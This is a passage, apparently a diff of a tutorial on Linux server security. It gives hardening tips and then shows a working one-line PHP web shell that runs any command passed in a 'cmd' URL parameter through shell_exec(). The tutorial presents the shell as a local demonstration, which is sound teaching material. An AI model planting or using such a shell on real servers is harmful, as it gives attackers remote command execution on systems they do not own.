 - Proper OS configuration– other exploits take advantage of the weaknesses in the configuration of the server.
 Inactive user names and daemons should be disabled.
 Default settings such as common passwords to application, default user names and some port numbers should be changed.

 - Intrusion Detection System– such tools can be used to detect unauthorized access to the system.
 Some tools have the ability to detect and prevent such attacks.

-In this practical scenario, we will provide you with basic information on how you can use PHP to compromise a Linux.
+In this practical scenario, we will learn how to hack with Ubuntu and we will provide you with basic information on how you can use PHP to compromise a Linux.
 We are not going to target any victim.
 If you want to try it out, you can install LAMPP on your local machine.

 For demonstration purposes, let’s assume the attacker managers to upload the following file on a web server.

 <?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>

 The above script gets the command from the GET variable named cmd.
 The command is executed using shell_exec() and the results returned in the browser.